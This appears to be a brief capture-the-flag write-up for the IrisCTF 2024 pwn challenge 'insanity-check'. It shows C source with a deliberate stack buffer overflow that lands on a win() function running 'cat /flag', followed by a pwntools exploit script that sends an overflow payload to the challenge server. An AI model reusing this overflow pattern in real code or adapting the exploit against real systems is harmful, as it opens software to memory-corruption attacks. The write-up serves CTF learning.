2024 IRIS CTF-PWN-【insanity-check】

文章目录

__attribute__((section(".flag")))
insanity-check
源码
exp

attribute((section(“.flag”)))

insanity-check

源码

发现溢出后字符串末尾的.com和四个空字符就是函数win（）的地址，溢出即可

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void rstrip(char* buf, const size_t len) {
    for (int i = len - 1; i >= 0; i--)
        if (buf[i] == '\n') {
            buf[i] = '\0';
            break;
        }
}

const char suffix[] = "! Welcome to IrisCTF2024. If you have any questions you can contact us at test@example.com\0\0\0\0";

int main() {
    char message[128];
    char name[64];
    fgets(name, 64, stdin);
    rstrip(name, 64);

    strcpy(message, "Hi there, ");
    strcpy(message + strlen(message), name);
    memcpy(message + strlen(message), suffix, sizeof(suffix));

    printf("%s\n", message);
}

__attribute__((section(".flag")))
void win() {
    __asm__("pop %rdi");
    system("cat /flag");
}
//0x000000006d6f632e

exp

from pwn import*
context(os="linux",arch="amd64",log_level="debug")
v=remote("insanity-check.chal.irisc.tf", 10003)
#最后字符串正好是win函数地址0x000000006d6f632e

payload=56*b"a"
sleep(3)
v.sendline(payload)
v.recvall()

v.interactive()